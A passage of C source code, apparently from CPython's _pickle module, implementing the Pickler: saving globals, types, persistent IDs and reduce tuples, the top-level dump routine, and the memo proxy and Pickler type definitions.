Py_DECREF(reduce_value);
if (status < 0)
goto error;
}
else {
/* Generate a normal global opcode if we are using a pickle
protocol < 4, or if the object is not registered in the
extension registry. */
PyObject *encoded;
PyObject *(*unicode_encoder)(PyObject *);
if (_Pickler_Write(self, &global_op, 1) < 0)
goto error;
/* For protocol < 3, unless the user opted out via fix_imports, we
convert module names to the old Python 2.x module names. */
if (self->proto < 3 && self->fix_imports) {
if (fix_imports(&module_name, &global_name) < 0) {
goto error;
}
}
/* Since Python 3.0 supports non-ASCII identifiers, we encode both
the module name and the global name using UTF-8. We do so only for
protocol 3 (protocol 4 and higher took the STACK_GLOBAL path above);
older protocols stick to ASCII so that the stream remains readable
by Unpicklers running on Python 2.x. */
if (self->proto == 3) {
unicode_encoder = PyUnicode_AsUTF8String;
}
else {
unicode_encoder = PyUnicode_AsASCIIString;
}
encoded = unicode_encoder(module_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle module identifier '%S' using "
"pickle protocol %i",
module_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if(_Pickler_Write(self, "\n", 1) < 0)
goto error;
/* Save the name of the module. */
encoded = unicode_encoder(global_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle global identifier '%S' using "
"pickle protocol %i",
global_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
goto error;
}
/* Memoize the object. */
if (memo_put(self, obj) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(module_name);
Py_XDECREF(global_name);
Py_XDECREF(module);
Py_XDECREF(parent);
Py_XDECREF(dotted_path);
Py_XDECREF(lastname);
return status;
}
static int
save_singleton_type(PicklerObject *self, PyObject *obj, PyObject *singleton)
{
PyObject *reduce_value;
int status;
reduce_value = Py_BuildValue("O(O)", &PyType_Type, singleton);
if (reduce_value == NULL) {
return -1;
}
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
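/* Pickle a type object. The hidden types of the None, Ellipsis and
   NotImplemented singletons cannot be found by name in their module, so
   they are reduced to type(singleton); every other type is pickled by
   reference through save_global(). */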
static int
save_type(PicklerObject *self, PyObject *obj)
{
if (obj == (PyObject *)&_PyNone_Type) {
return save_singleton_type(self, obj, Py_None);
}
else if (obj == (PyObject *)&PyEllipsis_Type) {
return save_singleton_type(self, obj, Py_Ellipsis);
}
else if (obj == (PyObject *)&_PyNotImplemented_Type) {
return save_singleton_type(self, obj, Py_NotImplemented);
}
return save_global(self, obj, NULL);
}
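/* Run the persistent_id hook on obj. Returns -1 on error, 0 when the hook
   returns None (the caller pickles obj normally), and 1 when a PERSID or
   BINPERSID record has been written for obj. */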
static int
save_pers(PicklerObject *self, PyObject *obj)
{
PyObject *pid = NULL;
int status = 0;
const char persid_op = PERSID;
const char binpersid_op = BINPERSID;
pid = call_method(self->pers_func, self->pers_func_self, obj);
if (pid == NULL)
return -1;
if (pid != Py_None) {
if (self->bin) {
if (save(self, pid, 1) < 0 ||
_Pickler_Write(self, &binpersid_op, 1) < 0)
goto error;
}
else {
PyObject *pid_str;
pid_str = PyObject_Str(pid);
if (pid_str == NULL)
goto error;
/* XXX: Should it check whether the pid contains embedded
newlines? */
if (!PyUnicode_IS_ASCII(pid_str)) {
PyErr_SetString(_Pickle_GetGlobalState()->PicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
Py_DECREF(pid_str);
goto error;
}
if (_Pickler_Write(self, &persid_op, 1) < 0 ||
_Pickler_Write(self, PyUnicode_DATA(pid_str),
PyUnicode_GET_LENGTH(pid_str)) < 0 ||
_Pickler_Write(self, "\n", 1) < 0) {
Py_DECREF(pid_str);
goto error;
}
Py_DECREF(pid_str);
}
status = 1;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(pid);
return status;
}
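/* Return a new reference to obj.__class__ when the attribute exists,
   falling back to Py_TYPE(obj); returns NULL with an exception set if the
   lookup itself fails. */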
static PyObject *
get_class(PyObject *obj)
{
PyObject *cls;
_Py_IDENTIFIER(__class__);
if (_PyObject_LookupAttrId(obj, &PyId___class__, &cls) == 0) {
cls = (PyObject *) Py_TYPE(obj);
Py_INCREF(cls);
}
return cls;
}
/* We're saving obj, and args is the 2-thru-5 tuple returned by the
* appropriate __reduce__ method for obj.
*/
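/* Informal example (only one possible shape): a typical reduce tuple looks
 * like (copyreg.__newobj__, (SomeClass,), state), which takes the NEWOBJ
 * branch below because the callable's __name__ is "__newobj__"; a plain
 * (callable, argtup) pair falls through to the REDUCE branch at the end. */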
static int
save_reduce(PicklerObject *self, PyObject *args, PyObject *obj)
{
PyObject *callable;
PyObject *argtup;
PyObject *state = NULL;
PyObject *listitems = Py_None;
PyObject *dictitems = Py_None;
PickleState *st = _Pickle_GetGlobalState();
Py_ssize_t size;
int use_newobj = 0, use_newobj_ex = 0;
const char reduce_op = REDUCE;
const char build_op = BUILD;
const char newobj_op = NEWOBJ;
const char newobj_ex_op = NEWOBJ_EX;
size = PyTuple_Size(args);
if (size < 2 || size > 5) {
PyErr_SetString(st->PicklingError, "tuple returned by "
"__reduce__ must contain 2 through 5 elements");
return -1;
}
if (!PyArg_UnpackTuple(args, "save_reduce", 2, 5,
&callable, &argtup, &state, &listitems, &dictitems))
return -1;
if (!PyCallable_Check(callable)) {
PyErr_SetString(st->PicklingError, "first item of the tuple "
"returned by __reduce__ must be callable");
return -1;
}
if (!PyTuple_Check(argtup)) {
PyErr_SetString(st->PicklingError, "second item of the tuple "
"returned by __reduce__ must be a tuple");
return -1;
}
if (state == Py_None)
state = NULL;
if (listitems == Py_None)
listitems = NULL;
else if (!PyIter_Check(listitems)) {
PyErr_Format(st->PicklingError, "fourth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(listitems)->tp_name);
return -1;
}
if (dictitems == Py_None)
dictitems = NULL;
else if (!PyIter_Check(dictitems)) {
PyErr_Format(st->PicklingError, "fifth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(dictitems)->tp_name);
return -1;
}
if (self->proto >= 2) {
PyObject *name;
_Py_IDENTIFIER(__name__);
if (_PyObject_LookupAttrId(callable, &PyId___name__, &name) < 0) {
return -1;
}
if (name != NULL && PyUnicode_Check(name)) {
_Py_IDENTIFIER(__newobj_ex__);
use_newobj_ex = _PyUnicode_EqualToASCIIId(
name, &PyId___newobj_ex__);
if (!use_newobj_ex) {
_Py_IDENTIFIER(__newobj__);
use_newobj = _PyUnicode_EqualToASCIIId(name, &PyId___newobj__);
}
}
Py_XDECREF(name);
}
if (use_newobj_ex) {
PyObject *cls;
PyObject *args;
PyObject *kwargs;
if (PyTuple_GET_SIZE(argtup) != 3) {
PyErr_Format(st->PicklingError,
"length of the NEWOBJ_EX argument tuple must be "
"exactly 3, not %zd", PyTuple_GET_SIZE(argtup));
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_Format(st->PicklingError,
"first item from NEWOBJ_EX argument tuple must "
"be a class, not %.200s", Py_TYPE(cls)->tp_name);
return -1;
}
args = PyTuple_GET_ITEM(argtup, 1);
if (!PyTuple_Check(args)) {
PyErr_Format(st->PicklingError,
"second item from NEWOBJ_EX argument tuple must "
"be a tuple, not %.200s", Py_TYPE(args)->tp_name);
return -1;
}
kwargs = PyTuple_GET_ITEM(argtup, 2);
if (!PyDict_Check(kwargs)) {
PyErr_Format(st->PicklingError,
"third item from NEWOBJ_EX argument tuple must "
"be a dict, not %.200s", Py_TYPE(kwargs)->tp_name);
return -1;
}
if (self->proto >= 4) {
if (save(self, cls, 0) < 0 ||
save(self, args, 0) < 0 ||
save(self, kwargs, 0) < 0 ||
_Pickler_Write(self, &newobj_ex_op, 1) < 0) {
return -1;
}
}
else {
PyObject *newargs;
PyObject *cls_new;
Py_ssize_t i;
_Py_IDENTIFIER(__new__);
newargs = PyTuple_New(PyTuple_GET_SIZE(args) + 2);
if (newargs == NULL)
return -1;
cls_new = _PyObject_GetAttrId(cls, &PyId___new__);
if (cls_new == NULL) {
Py_DECREF(newargs);
return -1;
}
PyTuple_SET_ITEM(newargs, 0, cls_new);
Py_INCREF(cls);
PyTuple_SET_ITEM(newargs, 1, cls);
for (i = 0; i < PyTuple_GET_SIZE(args); i++) {
PyObject *item = PyTuple_GET_ITEM(args, i);
Py_INCREF(item);
PyTuple_SET_ITEM(newargs, i + 2, item);
}
callable = PyObject_Call(st->partial, newargs, kwargs);
Py_DECREF(newargs);
if (callable == NULL)
return -1;
newargs = PyTuple_New(0);
if (newargs == NULL) {
Py_DECREF(callable);
return -1;
}
if (save(self, callable, 0) < 0 ||
save(self, newargs, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0) {
Py_DECREF(newargs);
Py_DECREF(callable);
return -1;
}
Py_DECREF(newargs);
Py_DECREF(callable);
}
}
else if (use_newobj) {
PyObject *cls;
PyObject *newargtup;
PyObject *obj_class;
int p;
/* Sanity checks. */
if (PyTuple_GET_SIZE(argtup) < 1) {
PyErr_SetString(st->PicklingError, "__newobj__ arglist is empty");
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args is not a type");
return -1;
}
if (obj != NULL) {
obj_class = get_class(obj);
p = obj_class != cls; /* true iff a problem */
Py_DECREF(obj_class);
if (p) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args has the wrong class");
return -1;
}
}
/* XXX: These calls to save() are prone to infinite recursion. Imagine
what happens if the value returned by the __reduce__() method of
some extension type contains another object of the same type. Ouch!
Here is a quick example that I ran into, to illustrate what I
mean:
>>> import pickle, copyreg
>>> copyreg.dispatch_table.pop(complex)
>>> pickle.dumps(1+2j)
Traceback (most recent call last):
...
RecursionError: maximum recursion depth exceeded
Removing the complex class from copyreg.dispatch_table made the
__reduce_ex__() method emit another complex object:
>>> (1+1j).__reduce_ex__(2)
(<function __newobj__ at 0xb7b71c3c>,
(<class 'complex'>, (1+1j)), None, None, None)
Thus, when save() was called on newargtup (the 2nd item), recursion
ensued. Of course, the bug was in the complex class, which had a
broken __getnewargs__() that emitted another complex object. But the
point here is that it is quite easy to end up with a broken reduce
function. */
/* Save the class and its __new__ arguments. */
if (save(self, cls, 0) < 0)
return -1;
newargtup = PyTuple_GetSlice(argtup, 1, PyTuple_GET_SIZE(argtup));
if (newargtup == NULL)
return -1;
p = save(self, newargtup, 0);
Py_DECREF(newargtup);
if (p < 0)
return -1;
/* Add NEWOBJ opcode. */
if (_Pickler_Write(self, &newobj_op, 1) < 0)
return -1;
}
else { /* Not using NEWOBJ. */
if (save(self, callable, 0) < 0 ||
save(self, argtup, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0)
return -1;
}
/* obj can be NULL when save_reduce() is used directly. A NULL obj means
the caller does not want to memoize the object. Not particularly useful,
but this mimics the behavior of save_reduce() in pickle.py when
obj is None. */
if (obj != NULL) {
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_op = POP;
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else if (memo_put(self, obj) < 0)
return -1;
}
if (listitems && batch_list(self, listitems) < 0)
return -1;
if (dictitems && batch_dict(self, dictitems) < 0)
return -1;
if (state) {
if (save(self, state, 0) < 0 ||
_Pickler_Write(self, &build_op, 1) < 0)
return -1;
}
return 0;
}
static int
save(PicklerObject *self, PyObject *obj, int pers_save)
{
PyTypeObject *type;
PyObject *reduce_func = NULL;
PyObject *reduce_value = NULL;
int status = 0;
if (_Pickler_OpcodeBoundary(self) < 0)
return -1;
/* The extra pers_save argument is necessary to avoid calling save_pers()
on its returned object. */
if (!pers_save && self->pers_func) {
/* save_pers() returns:
-1 to signal an error;
0 if it did nothing successfully;
1 if a persistent id was saved.
*/
if ((status = save_pers(self, obj)) != 0)
return status;
}
type = Py_TYPE(obj);
/* The old cPickle had an optimization that used switch-case statement
dispatching on the first letter of the type name. This was removed
since benchmarks showed that this optimization was actually slowing
things down. */
/* Atom types; these aren't memoized, so don't check the memo. */
if (obj == Py_None) {
return save_none(self, obj);
}
else if (obj == Py_False || obj == Py_True) {
return save_bool(self, obj);
}
else if (type == &PyLong_Type) {
return save_long(self, obj);
}
else if (type == &PyFloat_Type) {
return save_float(self, obj);
}
/* Check the memo to see if it has the object. If so, generate
a GET (or BINGET) opcode, instead of pickling the object
once again. */
if (PyMemoTable_Get(self->memo, obj)) {
return memo_get(self, obj);
}
if (type == &PyBytes_Type) {
return save_bytes(self, obj);
}
else if (type == &PyUnicode_Type) {
return save_unicode(self, obj);
}
/* We're only calling Py_EnterRecursiveCall here so that atomic
types above are pickled faster. */
if (Py_EnterRecursiveCall(" while pickling an object")) {
return -1;
}
if (type == &PyDict_Type) {
status = save_dict(self, obj);
goto done;
}
else if (type == &PySet_Type) {
status = save_set(self, obj);
goto done;
}
else if (type == &PyFrozenSet_Type) {
status = save_frozenset(self, obj);
goto done;
}
else if (type == &PyList_Type) {
status = save_list(self, obj);
goto done;
}
else if (type == &PyTuple_Type) {
status = save_tuple(self, obj);
goto done;
}
else if (type == &PyType_Type) {
status = save_type(self, obj);
goto done;
}
else if (type == &PyFunction_Type) {
status = save_global(self, obj, NULL);
goto done;
}
/* XXX: This part needs some unit tests. */
/* Get a reduction callable, and call it. This may come from
* self.dispatch_table, copyreg.dispatch_table, the object's
* __reduce_ex__ method, or the object's __reduce__ method.
*/
if (self->dispatch_table == NULL) {
PickleState *st = _Pickle_GetGlobalState();
reduce_func = PyDict_GetItemWithError(st->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_Occurred()) {
goto error;
}
} else {
/* PyDict_GetItemWithError() returns a borrowed reference.
Increase the reference count to be consistent with
PyObject_GetItem and _PyObject_GetAttrId used below. */
Py_INCREF(reduce_func);
}
} else {
reduce_func = PyObject_GetItem(self->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_ExceptionMatches(PyExc_KeyError))
PyErr_Clear();
else
goto error;
}
}
if (reduce_func != NULL) {
Py_INCREF(obj);
reduce_value = _Pickle_FastCall(reduce_func, obj);
}
else if (PyType_IsSubtype(type, &PyType_Type)) {
status = save_global(self, obj, NULL);
goto done;
}
else {
_Py_IDENTIFIER(__reduce__);
_Py_IDENTIFIER(__reduce_ex__);
/* XXX: If the __reduce__ method is defined, __reduce_ex__ is
automatically defined as __reduce__. While this is convenient, it
makes it impossible to know which method was actually called. Of
course, this is not a big deal. But still, it would be nice to let
the user know which method was called when something goes
wrong. Incidentally, this means that if __reduce_ex__ is not defined, we
don't actually have to check for a __reduce__ method. */
/* Check for a __reduce_ex__ method. */
if (_PyObject_LookupAttrId(obj, &PyId___reduce_ex__, &reduce_func) < 0) {
goto error;
}
if (reduce_func != NULL) {
PyObject *proto;
proto = PyLong_FromLong(self->proto);
if (proto != NULL) {
reduce_value = _Pickle_FastCall(reduce_func, proto);
}
}
else {
PickleState *st = _Pickle_GetGlobalState();
/* Check for a __reduce__ method. */
reduce_func = _PyObject_GetAttrId(obj, &PyId___reduce__);
if (reduce_func != NULL) {
reduce_value = _PyObject_CallNoArg(reduce_func);
}
else {
PyErr_Format(st->PicklingError,
"can't pickle '%.200s' object: %R",
type->tp_name, obj);
goto error;
}
}
}
if (reduce_value == NULL)
goto error;
if (PyUnicode_Check(reduce_value)) {
status = save_global(self, obj, reduce_value);
goto done;
}
if (!PyTuple_Check(reduce_value)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"__reduce__ must return a string or tuple");
goto error;
}
status = save_reduce(self, reduce_value, obj);
if (0) {
error:
status = -1;
}
done:
Py_LeaveRecursiveCall();
Py_XDECREF(reduce_func);
Py_XDECREF(reduce_value);
return status;
}
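/* Top-level pickling entry point: emit the 2-byte PROTO header for
   protocol >= 2, enable framing for protocol >= 4, pickle obj via save(),
   then write the STOP opcode and commit the final frame. */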
static int
dump(PicklerObject *self, PyObject *obj)
{
const char stop_op = STOP;
if (self->proto >= 2) {
char header[2];
header[0] = PROTO;
assert(self->proto >= 0 && self->proto < 256);
header[1] = (unsigned char)self->proto;
if (_Pickler_Write(self, header, 2) < 0)
return -1;
if (self->proto >= 4)
self->framing = 1;
}
if (save(self, obj, 0) < 0 ||
_Pickler_Write(self, &stop_op, 1) < 0 ||
_Pickler_CommitFrame(self) < 0)
return -1;
self->framing = 0;
return 0;
}
/*[clinic input]
_pickle.Pickler.clear_memo
Clears the pickler's "memo".
The memo is the data structure that remembers which objects the
pickler has already seen, so that shared or recursive objects are
pickled by reference and not by value. This method is useful when
re-using picklers.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_clear_memo_impl(PicklerObject *self)
/*[clinic end generated code: output=8665c8658aaa094b input=01bdad52f3d93e56]*/
{
if (self->memo)
PyMemoTable_Clear(self->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.dump
obj: object
/
Write a pickled representation of the given object to the open file.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_dump(PicklerObject *self, PyObject *obj)
/*[clinic end generated code: output=87ecad1261e02ac7 input=552eb1c0f52260d9]*/
{
/* Check whether the Pickler was initialized correctly (issue3664).
Developers often forget to call __init__() in their subclasses, which
would trigger a segfault without this check. */
if (self->write == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->PicklingError,
"Pickler.__init__() was not called by %s.__init__()",
Py_TYPE(self)->tp_name);
return NULL;
}
if (_Pickler_ClearBuffer(self) < 0)
return NULL;
if (dump(self, obj) < 0)
return NULL;
if (_Pickler_FlushToFile(self) < 0)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Pickler___sizeof___impl(PicklerObject *self)
/*[clinic end generated code: output=106edb3123f332e1 input=8cbbec9bd5540d42]*/
{
Py_ssize_t res, s;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL) {
res += sizeof(PyMemoTable);
res += self->memo->mt_allocated * sizeof(PyMemoEntry);
}
if (self->output_buffer != NULL) {
s = _PySys_GetSizeOf(self->output_buffer);
if (s == -1)
return -1;
res += s;
}
return res;
}
static struct PyMethodDef Pickler_methods[] = {
_PICKLE_PICKLER_DUMP_METHODDEF
_PICKLE_PICKLER_CLEAR_MEMO_METHODDEF
_PICKLE_PICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Pickler_dealloc(PicklerObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->output_buffer);
Py_XDECREF(self->write);
Py_XDECREF(self->pers_func);
Py_XDECREF(self->dispatch_table);
Py_XDECREF(self->fast_memo);
PyMemoTable_Del(self->memo);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Pickler_traverse(PicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->write);
Py_VISIT(self->pers_func);
Py_VISIT(self->dispatch_table);
Py_VISIT(self->fast_memo);
return 0;
}
static int
Pickler_clear(PicklerObject *self)
{
Py_CLEAR(self->output_buffer);
Py_CLEAR(self->write);
Py_CLEAR(self->pers_func);
Py_CLEAR(self->dispatch_table);
Py_CLEAR(self->fast_memo);
if (self->memo != NULL) {
PyMemoTable *memo = self->memo;
self->memo = NULL;
PyMemoTable_Del(memo);
}
return 0;
}
/*[clinic input]
_pickle.Pickler.__init__
file: object
protocol: object = NULL
fix_imports: bool = True
This takes a binary file for writing a pickle data stream.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 3, a backward-incompatible protocol designed for Python 3.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static int
_pickle_Pickler___init___impl(PicklerObject *self, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=b5f31078dab17fb0 input=4faabdbc763c2389]*/
{
_Py_IDENTIFIER(persistent_id);
_Py_IDENTIFIER(dispatch_table);
/* In case of multiple __init__() calls, clear previous content. */
if (self->write != NULL)
(void)Pickler_clear(self);
if (_Pickler_SetProtocol(self, protocol, fix_imports) < 0)
return -1;
if (_Pickler_SetOutputStream(self, file) < 0)
return -1;
/* memo and output_buffer may have already been created in _Pickler_New */
if (self->memo == NULL) {
self->memo = PyMemoTable_New();
if (self->memo == NULL)
return -1;
}
self->output_len = 0;
if (self->output_buffer == NULL) {
self->max_output_len = WRITE_BUF_SIZE;
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->output_buffer == NULL)
return -1;
}
self->fast = 0;
self->fast_nesting = 0;
self->fast_memo = NULL;
if (init_method_ref((PyObject *)self, &PyId_persistent_id,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
if (_PyObject_LookupAttrId((PyObject *)self,
&PyId_dispatch_table, &self->dispatch_table) < 0) {
return -1;
}
return 0;
}
/* Define a proxy object for the Pickler's internal memo object. This is to
* avoid breaking code like:
* pickler.memo.clear()
* and
* pickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*/
/*[clinic input]
_pickle.PicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_clear_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=5fb9370d48ae8b05 input=ccc186dacd0f1405]*/
{
if (self->pickler->memo)
PyMemoTable_Clear(self->pickler->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.PicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_copy_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bb83a919d29225ef input=b73043485ac30b36]*/
{
PyMemoTable *memo;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
memo = self->pickler->memo;
for (size_t i = 0; i < memo->mt_allocated; ++i) {
PyMemoEntry entry = memo->mt_table[i];
if (entry.me_key != NULL) {
int status;
PyObject *key, *value;
key = PyLong_FromVoidPtr(entry.me_key);
value = Py_BuildValue("nO", entry.me_value, entry.me_key);
if (key == NULL || value == NULL) {
Py_XDECREF(key);
Py_XDECREF(value);
goto error;
}
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
Py_DECREF(value);
if (status < 0)
goto error;
}
}
return new_memo;
error:
Py_XDECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.PicklerMemoProxy.__reduce__
Implement pickle support.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy___reduce___impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bebba1168863ab1d input=2f7c540e24b7aae4]*/
{
PyObject *reduce_value, *dict_args;
PyObject *contents = _pickle_PicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
dict_args = PyTuple_New(1);
if (dict_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(dict_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, dict_args);
return reduce_value;
}
static PyMethodDef picklerproxy_methods[] = {
_PICKLE_PICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_PICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_PICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
PicklerMemoProxy_dealloc(PicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->pickler);
PyObject_GC_Del((PyObject *)self);
}
static int
PicklerMemoProxy_traverse(PicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->pickler);
return 0;
}
static int
PicklerMemoProxy_clear(PicklerMemoProxyObject *self)
{
Py_CLEAR(self->pickler);
return 0;
}
static PyTypeObject PicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.PicklerMemoProxy", /*tp_name*/
sizeof(PicklerMemoProxyObject), /*tp_basicsize*/
0,
(destructor)PicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)PicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)PicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
picklerproxy_methods, /* tp_methods */
};
static PyObject *
PicklerMemoProxy_New(PicklerObject *pickler)
{
PicklerMemoProxyObject *self;
self = PyObject_GC_New(PicklerMemoProxyObject, &PicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(pickler);
self->pickler = pickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Pickler_get_memo(PicklerObject *self)
{
return PicklerMemoProxy_New(self);
}
static int
Pickler_set_memo(PicklerObject *self, PyObject *obj)
{
PyMemoTable *new_memo = NULL;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &PicklerMemoProxyType) {
PicklerObject *pickler =
((PicklerMemoProxyObject *)obj)->pickler;
new_memo = PyMemoTable_Copy(pickler->memo);
if (new_memo == NULL)
return -1;
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo = PyMemoTable_New();
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t memo_id;
PyObject *memo_obj;
if (!PyTuple_Check(value) || PyTuple_GET_SIZE(value) != 2) {
PyErr_SetString(PyExc_TypeError,
"'memo' values must be 2-item tuples");
goto error;
}
memo_id = PyLong_AsSsize_t(PyTuple_GET_ITEM(value, 0));
if (memo_id == -1 && PyErr_Occurred())
goto error;
memo_obj = PyTuple_GET_ITEM(value, 1);
if (PyMemoTable_Set(new_memo, memo_obj, memo_id) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be a PicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
PyMemoTable_Del(self->memo);
self->memo = new_memo;
return 0;
error:
if (new_memo)
PyMemoTable_Del(new_memo);
return -1;
}
static PyObject *
Pickler_get_persid(PicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_id");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Pickler_set_persid(PicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_id must be a callable taking one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyMemberDef Pickler_members[] = {
{"bin", T_INT, offsetof(PicklerObject, bin)},
{"fast", T_INT, offsetof(PicklerObject, fast)},
{"dispatch_table", T_OBJECT_EX, offsetof(PicklerObject, dispatch_table)},
{NULL}
};
static PyGetSetDef Pickler_getsets[] = {
{"memo", (getter)Pickler_get_memo,
(setter)Pickler_set_memo},
{"persistent_id", (getter)Pickler_get_persid,
(setter)Pickler_set_persid},
{NULL}
};
static PyTypeObject Pickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pickler" , /*tp_name*/
sizeof(PicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Pickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
